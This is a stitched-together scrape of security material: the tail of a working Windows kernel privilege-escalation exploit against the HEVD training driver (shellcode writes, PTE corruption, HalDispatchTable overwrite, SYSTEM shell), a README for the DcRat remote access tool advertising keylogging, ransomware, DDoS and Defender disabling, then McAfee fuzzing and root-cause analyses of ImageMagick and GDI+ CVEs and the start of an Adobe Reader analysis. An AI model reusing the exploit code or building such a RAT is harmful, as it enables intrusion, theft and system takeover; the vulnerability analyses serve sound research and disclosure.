    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i <= 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Increase the counter
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

DcRat - A Simple Remote Tool Written In C#


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and security
  • Server IP port can be archived through link
  • Multi-Server,multi-port support
  • Plugin system through Dll, which has strong expansibility
  • Super tiny client size (about 40~50K)
  • Data transform with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build:vs2019
  • Runtime:
Project Runtime
Server .NET Framework 4.61
Client and others .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the lastest release.


Attention

我(簞純)对您由使用或传播等由此软件引起的任何行为和/或损害不承担任何责任。您对使用此软件的任何行为承担全部责任,并承认此软件仅用于教育和研究目的。下载本软件或软件的源代码,您自动同意上述内容。
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure –help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=”-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer” LDFLAGS=”-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer” ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> — magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> — magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a  ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
  3. Bitmap data – Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

  1. What is “pixels” and what data it contains?
  2. Why it is crashing?
  3. How this was fixed?

Finding root cause:

To start with, we can check “ReadTIFFImage” function in coders/tiff.c file and see that it allocates memory using a “AcquireQuantumMemory” function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above,  “image->columns * sizeof(uint64)” is also added to extent, which results in 24 added to extent, so extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to “AcquireQuantumMemory” function and total memory of 248 bytes get allocated.

This is how memory is allocated.

“Strip_pixel” is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe” which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and this is assigned to a variable “p”, as mentioned in below image. Please also note that “p” will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from TIFF file and stores it into newly allocated buffer “strip_pixels” of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called “StripOffsets” and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” is responsible for iterating for “samples_per_pixel” time which is 3.
  • The second “for loop” is responsible for iterating the pixel data for “image->rows” times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
  • Inside this second for loop, we can see something like this:

  • We can notice that “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels” and after each call to “ImportQuantumPixel”, value of “p” will be increased by “stride”.

Here “stride” is calculated by calling function “TIFFVStripSize()” function which as per documentation returns the number of bytes in a strip with nrows rows of data.  In this case it is 14. So, every time pointer “p” is incremented by “14” or “0xE” inside the second for loop.

If we print the image structure which is passed to “ImportQuantumPixels” function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to “ImportRGBQuantum” and then to the “PushQuantumPixel” function and one of the arguments to this function is the pixels data which is pointed by “p”. Remember that this points to the memory address which was previously allocated using the “AcquireQuantumMemory” function, and that its length is 248 byte and every time value of “p” is increased by 14.

The “PushQuantumPixel” function is used to read pixel data from “p” into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure “quantum_Info”. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixels” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process strip data for image, a pointer “p” points to this memory.
  2. Inside a for loop this pointer is increased by “14” or “0xE” for number of rows in the image, which in this case is 32.
  3. Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
  4. The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2nd argument to “AcquireQuantumMemory” is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

Consejos para protegerte de quienes intentan hackear tus correos electrónicos

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability.  This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable “Image->GetThumbnailImage” code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 — gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 —coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 — gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing—namely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

  • Green indicates that the patched and unpatched blocks are same.
  • Yellow blocks indicate there has been some changes between unpatched and patched dlls.
  • Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to “GetuntrimmedCharacterCount” function and later on there is another call to a function “SetSpan::SpanVector
  • In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” where a return value stored inside EAX register is checked. If it’s zero, then control jumps to another location—a destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

  1. Why our program is crashing with the provided POC file?
  2. What field in the file is causing this crash?
  3. What value of the field?
  4. Which condition in program which is causing this crash?
  5. How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

  1. EMF Header – This contains information about EMF structure.
  2. EMF Records – This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function “gdiplus!GdipPlayMetafileRecordCallback

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something  like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside “Builtline::BuildAllLines” function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the “Builtline::BuiltLine”
  2. The “Builtline::BuiltLine” function moves data to the newly allocated memory and then it calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
  4. The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL, the program doesn’t terminate because of the way loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to Loop counter(ECX) and doesn’t increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. Return value of “BuiltLine::GetUntrimmedCharacterCount” is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn’t exist if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the “ECX” value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to “FullTextImager::Render” function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to “FullTextImager::RenderLine” function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function and this resulted in taking a different program path that  corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

 

 

 

 

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

